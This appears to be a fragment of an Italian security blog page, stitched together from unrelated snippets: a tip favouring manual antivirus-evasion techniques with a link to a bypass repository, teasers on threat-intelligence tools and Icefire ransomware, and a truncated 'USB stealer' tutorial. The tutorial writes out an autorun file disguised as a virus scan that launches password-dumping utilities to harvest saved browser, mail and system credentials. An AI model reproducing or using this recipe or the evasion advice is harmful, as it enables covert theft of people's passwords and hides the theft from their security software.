as a reminder: it is highly recommended to read the articles related to manual techniques rather than using open source tools which are more likely to be suspected by the anti-virus because of IOSs

https://github.com/CMEPW/BypassAV

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Explore More

50 Best Free Cyber Threat Intelligence Tools – 2023

By BALAJI N February 5, 2023 https://gbhackers.com/cyber-threat-intelligence-tools/ Threat Intelligence Tools are more often used by security industries to test the vulnerabilities in network and applications. It helps with the collection

Il ransomware Icefire, scoperto a marzo 2022, è tornato all’inizio di quest’anno nel panorama delle minacce informatiche. Gli hacker distribuiscono la loro nuova variante di malware per crittografare i sistemi

HOW TO MAKE A USB STEALER

◼️TUTORIAL: open notepad/wordpadtype:[autorun]open=launch.batACTION= Perform a Virus Scansave this as AUTORUN.inf open a new notepad/wordpad documenttype:start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txtstart iepv.exe /stext iepv.txtstart pspv.exe /stext pspv.txtstart PasswordFox.exe /stext passwordfox.txtstart